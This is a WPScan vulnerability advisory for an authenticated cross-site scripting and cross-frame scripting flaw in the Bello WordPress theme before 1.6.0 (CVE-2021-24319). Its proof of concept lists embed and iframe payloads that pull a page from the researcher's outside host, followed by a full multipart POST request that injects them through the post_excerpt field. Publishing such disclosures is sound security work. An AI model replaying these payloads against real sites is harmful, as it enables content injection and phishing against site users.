WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS

Description

The theme did not properly sanitise its post_excerpt parameter before outputting it back in the shop/my-account/bello-listing-endpoint/ page, leading to a Cross-Site Scripting issue

Proof of Concept

### -- [ Payloads: ]

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html>

[$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>



### -- [ PoC | Authenticated XFS | My Listings: ]

[!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"

</textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>
<iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--

Affects Themes

bello
Fixed in version 1.6.0

References

CVE
CVE-2021-24319
URL
https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-1021%5D-Bello-WordPress-Theme-v1.5.9.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
2c274eb7-25f1-49d4-a2c8-8ce8cecebe68

Timeline

Publicly Published

2021-05-16 (about 1 years ago)

Added

2021-05-16 (about 1 years ago)

Last Updated

2021-05-17 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin